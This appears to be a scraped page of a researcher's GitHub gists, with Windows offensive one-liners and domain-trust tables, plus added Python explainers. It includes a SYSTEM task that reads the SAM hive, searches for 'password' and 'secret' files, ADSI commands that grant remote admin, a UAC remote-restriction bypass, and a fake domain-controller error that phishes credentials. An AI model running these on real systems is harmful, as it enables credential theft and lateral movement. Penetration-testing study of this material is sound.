Will HarmJ0y
geeking out about Kerberos
HarmJ0y / findsid.bat
Last active Aug 29, 2015
Win7 Powershell SID Enumeration
:: HKLM\SECURITY is readable only by SYSTEM, so the read is run as a one-shot SYSTEM scheduled task;
:: the machine SID is the trailing 24 bytes of the SAM Domains\Account "V" value (S-1-5-21-A-B-C = 8-byte header + 4 sub-authorities).
schtasks /create /tn GetSid /tr "powershell.exe -c '$k=Get-Item HKLM:\security\sam\domains\account;$v=Get-ItemProperty $k.pspath;New-Object System.Security.Principal.SecurityIdentifier([Byte[]]$v.V[-24..-1],0)|Format-List *|Out-File c:\sid.txt'" /sc minute /ru System /MO 1 & choice /C X /T 60 /D X > nul & schtasks /delete /tn GetSid /f
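The one-liner works because the machine SID is stored as the last 24 bytes of that V value. As an added example (Python, not part of the gist; chosen because the byte layout is platform-neutral and the same decode is useful against an offline copy of the SAM/SECURITY hives), here is a parser and encoder for the binary SID structure, plus the trailing-24-byte extraction the one-liner relies on. The V blob and the SID value used as input are constructed for the example:

```python
import struct

# Binary SID layout:
#   revision (1 byte) | sub-authority count (1 byte) | identifier authority (6 bytes, big-endian)
#   | sub-authorities (4 bytes each, little-endian)
# A machine/domain SID S-1-5-21-A-B-C carries 4 sub-authorities (21, A, B, C),
# so it is 8 + 4*4 = 24 bytes, which is why the one-liner slices V[-24..-1].

def parse_sid(blob: bytes, offset: int = 0) -> str:
    """Decode a binary SID starting at `offset` into its S-1-... string form."""
    if len(blob) - offset < 8:
        raise ValueError("SID header needs at least 8 bytes")
    revision, count = blob[offset], blob[offset + 1]
    if revision != 1:
        raise ValueError("unsupported SID revision %d" % revision)
    if count > 15:
        raise ValueError("sub-authority count %d exceeds SID_MAX_SUB_AUTHORITIES (15)" % count)
    authority = int.from_bytes(blob[offset + 2:offset + 8], "big")
    body = blob[offset + 8:offset + 8 + 4 * count]
    if len(body) != 4 * count:
        raise ValueError("truncated SID body")
    subs = struct.unpack("<%dI" % count, body)
    return "S-%d-%d%s" % (revision, authority, "".join("-%d" % s for s in subs))

def build_sid(sid: str) -> bytes:
    """Encode an S-1-... string back into binary form (inverse of parse_sid)."""
    parts = sid.split("-")
    if len(parts) < 3 or parts[0] != "S":
        raise ValueError("malformed SID string")
    revision, authority = int(parts[1]), int(parts[2])
    subs = [int(p) for p in parts[3:]]
    return (bytes([revision, len(subs)]) + authority.to_bytes(6, "big")
            + struct.pack("<%dI" % len(subs), *subs))

def machine_sid_from_v(v_value: bytes) -> str:
    """The SAM Domains\\Account 'V' value ends with the 24-byte machine SID."""
    if len(v_value) < 24:
        raise ValueError("V value too short to hold a machine SID")
    sid = parse_sid(v_value[-24:])
    if not sid.startswith("S-1-5-21-"):
        raise ValueError("unexpected machine SID %s" % sid)
    return sid

def with_rid(domain_sid: str, rid: int) -> str:
    """Append a RID: machine SID + 500 is the built-in Administrator, + 501 is Guest."""
    return "%s-%d" % (domain_sid, rid)

# Constructed sample input: an opaque prefix followed by the machine SID. The SID value
# is invented for this example; a real V blob holds other account-policy fields first.
SAMPLE_MACHINE_SID = "S-1-5-21-1004336348-1177238915-682003330"
SAMPLE_V = bytes(range(0x40)) + build_sid(SAMPLE_MACHINE_SID)

if __name__ == "__main__":
    sid = machine_sid_from_v(SAMPLE_V)
    print("machine SID      :", sid)
    print("local Admin (500):", with_rid(sid, 500))
    print("round-trip ok    :", parse_sid(build_sid(sid)) == sid)
```

The same `parse_sid` decodes any SID pulled from a registry blob or a security descriptor, not only the machine SID; `with_rid` is how the local Administrator and Guest SIDs are derived once the machine SID is known.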
Powershell-File-Listings.txt
# all files in sortable csv
powershell.exe -command "get-childitem .\ -rec -ErrorAction SilentlyContinue | where {!$_.PSIsContainer} | select-object FullName, @{Name='Owner';Expression={(Get-Acl $_.FullName).Owner}}, LastAccessTime, LastWriteTime, Length | export-csv -notypeinformation -path files.csv"
# grep for specific file types
powershell.exe -command "get-childitem .\ -rec -ErrorAction SilentlyContinue -include @('*.doc*','*.xls*','*.pdf')|where{!$_.PSIsContainer}|select-object FullName,@{Name='Owner';Expression={(Get-Acl $_.FullName).Owner}},LastAccessTime,LastWriteTime,Length|export-csv -notypeinformation -path files.csv"
# grep for specific key words in file names
powershell.exe -command "get-childitem .\ -rec -ErrorAction SilentlyContinue -include @('*password*','*sensitive*','*secret*')|where{!$_.PSIsContainer}|select-object FullName,@{Name='Owner';Expression={(Get-Acl $_.FullName).Owner}},LastAccessTime,LastWriteTime,Length|export-csv -notypeinformation -path files.csv"
HarmJ0y / gist:fd98c4f16575ba28c091
Last active Apr 7, 2020
Powershell ADSI tricks
# Add a domain user to a remote server local group, if your current user has admin over the remote machine
powershell -c "([ADSI]'WinNT://SERVER/Administrators,group').add('WinNT://DOMAIN/USER,user')"
# Get all local groups on a remote server
powershell -c "([ADSI]'WinNT://SERVER,computer').psbase.children | where { $_.psbase.schemaClassName -eq 'group' } | foreach { ($_.name)[0]}"
# Find members of the local Administrators group on a remote server
powershell -c "$([ADSI]'WinNT://SERVER/Administrators,group').psbase.Invoke('Members') | foreach { $_.GetType().InvokeMember('ADspath', 'GetProperty', $null, $_, $null).Replace('WinNT://', '') }"
# Enable the local Administrator account on a remote server
HarmJ0y / psremoting.ps1
Last active Oct 31, 2017
Enable PSRemoting
#Run winrm quickconfig defaults
echo Y | winrm quickconfig
#Run enable psremoting command with defaults
Enable-PSRemoting -force
# Adjust the local token filter policy: 1 turns off UAC remote restrictions, so every member of the
# local Administrators group (not only RID 500) gets a full admin token over the network. This is what
# lets PSRemoting/WMI work with local admin accounts, and it equally widens exposure to pass-the-hash
# with those same local accounts.
Set-ItemProperty -Path HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LocalAccountTokenFilterPolicy -Value 1 -Type DWord
# Enable TrustedHosts for universal access
HarmJ0y / ubuntu_veil_evasion_setup.sh
Last active Mar 3, 2020
This short script will install Metasploit as well as Veil-Evasion on Ubuntu
#!/bin/bash
sudo apt-get install git
cd /tmp/
git clone https://github.com/darkoperator/MSF-Installer.git
cd MSF-Installer
sudo ./msf_install.sh -i
source ~/.bashrc
sudo chmod 0666 /usr/local/share/metasploit-framework/log/production.log
prompt.ps1
# Stolen/adapted from http://blog.logrhythm.com/security/do-you-trust-your-computer/
# POC from greg.foss[at]owasp.org
function prompt {
Add-Type -AssemblyName Microsoft.VisualBasic
[Microsoft.VisualBasic.Interaction]::MsgBox('Lost contact with the Domain Controller.', 'OKOnly,MsgBoxSetForeground,SystemModal,Critical', 'ERROR - 0xA801B720')
$c=[System.Security.Principal.WindowsIdentity]::GetCurrent().name
$credential = $host.ui.PromptForCredential("Credentials Required", "Please enter your user name and password.", $c, "NetBiosUserName")
HarmJ0y / random.ps1
Last active May 21, 2018
random data file one-liner
# Writes $megs MiB of pseudo-random ASCII to %TEMP%\data.dat: each inner pass writes a shuffled 64-char
# string repeated 4096 times (256 KiB), four passes per MiB. The writer is closed at the end so the
# buffered tail is flushed and the file is released.
$megs=1000;$w=New-Object IO.streamWriter $env:temp\data.dat;[char[]]$c='azertyuiopqsdfghjklmwxcvbnAZERTYUIOPQSDFGHJKLMWXCVBN0123456789-_';1..$megs|ForEach-Object{1..4|ForEach-Object{$r=$c|Get-Random -Count $c.Count;$s=-join $r;$w.Write($s*4kb);}};$w.Close()
HarmJ0y / gist:57f1dac93fcc3564f9b3
Created Oct 23, 2014
domain user to sid and sid to user
# user to SID
(New-Object System.Security.Principal.NTAccount("DOMAIN","USER")).Translate([System.Security.Principal.SecurityIdentifier]).Value
# SID to user
(New-Object System.Security.Principal.SecurityIdentifier("SID")).Translate( [System.Security.Principal.NTAccount]).Value
HarmJ0y / trusts.csv
Created Dec 29, 2014
Simple Domain Trust Output
SourceDomain TargetDomain TrustType TrustDirection
finance.mothership.com mothership.com ParentChild Bidirectional
mothership.com corp.mothership.com ParentChild Bidirectional
mothership.com finance.mothership.com ParentChild Bidirectional
mothership.com engineering.mothership.com ParentChild Bidirectional
corp.mothership.com mothership.com ParentChild Bidirectional
corp.mothership.com subsidiary.com External Inbound
finance.mothership.com mothership.com ParentChild Bidirectional
engineering.mothership.com mothership.com ParentChild Bidirectional
subsidiary.com product.subsidiary.com ParentChild Bidirectional
HarmJ0y / trusts_complex.csv
Created Dec 29, 2014
More Complex Domain Trust Example
SourceDomain TargetDomain TrustType TrustDirection
finance.mothership.com mothership.com ParentChild Bidirectional
mothership.com corp.mothership.com ParentChild Bidirectional
mothership.com finance.mothership.com ParentChild Bidirectional
mothership.com contracts.mothership.com ParentChild Bidirectional
corp.mothership.com mothership.com ParentChild Bidirectional
contracts.mothership.com mothership.com ParentChild Bidirectional
contracts.mothership.com product.othercompany.com External Inbound
product.othercompany.com contracts.mothership.com External Outbound
product.othercompany.com othercompany.com ParentChild Bidirectional
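Both trust tables above list each relationship from the SourceDomain's point of view, with TrustDirection following the .NET TrustDirection convention: Inbound means the source trusts the target (the target's principals can reach the source's resources), Outbound the reverse, Bidirectional both. As an added example that is not part of either gist (Python, so it runs anywhere the exported table is at hand), the following parses a table in exactly this layout, turns each row into "principals of X can reach resources of Y" edges, and computes which domains a principal from a given home domain can authenticate to, treating ParentChild trusts as transitive chains and External trusts as single non-transitive hops. The complex table is embedded as a constructed copy; the simpler one parses the same way. SID filtering and selective authentication, which can further restrict a trust, are not modelled:

```python
from collections import deque

# Constructed copy of the "More Complex Domain Trust Example" table, same column layout.
TRUSTS_COMPLEX = """\
SourceDomain TargetDomain TrustType TrustDirection
finance.mothership.com mothership.com ParentChild Bidirectional
mothership.com corp.mothership.com ParentChild Bidirectional
mothership.com finance.mothership.com ParentChild Bidirectional
mothership.com contracts.mothership.com ParentChild Bidirectional
corp.mothership.com mothership.com ParentChild Bidirectional
contracts.mothership.com mothership.com ParentChild Bidirectional
contracts.mothership.com product.othercompany.com External Inbound
product.othercompany.com contracts.mothership.com External Outbound
product.othercompany.com othercompany.com ParentChild Bidirectional
"""

# Trust types that extend to other domains the partner trusts. External trusts are not.
TRANSITIVE = {"ParentChild", "TreeRoot", "Forest"}

def parse_trusts(text):
    """Whitespace-delimited table with a header row -> list of dict rows."""
    lines = [line.split() for line in text.strip().splitlines()]
    header = lines[0]
    rows = []
    for cols in lines[1:]:
        if len(cols) != len(header):
            raise ValueError("malformed row: %r" % cols)
        rows.append(dict(zip(header, cols)))
    return rows

def access_edges(rows):
    """Set of (principal_domain, resource_domain, transitive) edges.

    Inbound = Source trusts Target, so Target's principals reach Source's resources;
    Outbound = Target trusts Source; Bidirectional = both.
    """
    edges = set()
    for r in rows:
        src, dst = r["SourceDomain"], r["TargetDomain"]
        direction = r["TrustDirection"]
        if direction not in ("Inbound", "Outbound", "Bidirectional"):
            raise ValueError("unknown TrustDirection %r" % direction)
        transitive = r["TrustType"] in TRANSITIVE
        if direction in ("Inbound", "Bidirectional"):
            edges.add((dst, src, transitive))
        if direction in ("Outbound", "Bidirectional"):
            edges.add((src, dst, transitive))
    return edges

def reachable_resources(edges, home):
    """Domains whose resources a principal from `home` can authenticate to.

    Transitive edges are followed as a chain (BFS). A non-transitive edge covers only
    the trusting/trusted pair itself, so it is usable only as a direct hop from `home`
    and is never continued from.
    """
    out = {}
    for a, b, transitive in edges:
        out.setdefault(a, []).append((b, transitive))
    seen = set()
    queue = deque([home])
    while queue:
        cur = queue.popleft()
        for nxt, transitive in out.get(cur, []):
            if nxt == home or nxt in seen:
                continue
            if transitive:
                seen.add(nxt)
                queue.append(nxt)
            elif cur == home:
                seen.add(nxt)
    return sorted(seen)

if __name__ == "__main__":
    edges = access_edges(parse_trusts(TRUSTS_COMPLEX))
    for home in ("mothership.com", "product.othercompany.com", "othercompany.com"):
        print("%-26s -> %s" % (home, ", ".join(reachable_resources(edges, home)) or "(none)"))
```

Run against the complex table, this shows the point of the external trust pair: a principal from product.othercompany.com can reach contracts.mothership.com but nothing beyond it, a principal from othercompany.com cannot reach mothership.com at all (the External trust does not chain through the parent-child trust), and nothing in mothership.com's forest can reach product.othercompany.com since the trust only runs one way.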